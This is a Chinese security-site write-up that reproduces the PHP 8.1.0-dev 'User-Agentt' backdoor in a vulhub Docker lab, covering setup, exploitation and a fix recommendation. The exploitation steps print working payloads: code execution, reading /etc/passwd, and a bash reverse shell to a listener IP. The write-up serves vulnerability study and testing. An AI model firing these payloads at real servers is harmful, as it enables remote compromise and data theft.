首页 /资讯 / 安全 / 正文

PHP-8.1.0-dev 后门命令执行漏洞复现

2021-06-17| 发布者: xiaotiger|

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。0x01影响范围PHP 8.1.0-dev0x02环境搭建1、本次环境 ... ...

0x00漏洞描述

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。


0x01影响范围

PHP 8.1.0-dev


0x02环境搭建

1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址:

https://github.com/vulhub/vulhub

2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录

cd vulhub-master/php/8.1-backdoor/

3、使用以下命令启动漏洞环境

docker-compose up -d

4、启动完成后在浏览器访问以下地址出现Hello world表示搭建成功

http://your-ip:8080/

0x03漏洞复现

1、访问漏洞页面,然后打开Burp抓取首页的包并发送到Repeater(重放)模块

2、在数据包中添加User-Agentt: 字段并在后面添加上测试漏洞poc:

zerodiumvar_dump(3*7);

3、将字段后面poc修改为zerodiumsystem("cat /etc/passwd");读取文件

4、修改payload执行反弹shell,打开一台kali并设置监听,将poc修改为以下反弹shell的poc

zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/172.16.1.151/6678 0>&1'");

0x04修复建议

1、建议升级或安装相应补丁


参考链接:

https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor

0人已打赏

0条评论 176人参与 网友评论 文明发言,请先登录

文明上网理性发言,请遵守国家法律法规。

最新评论

©2021 HACKBASE 黑名单手机版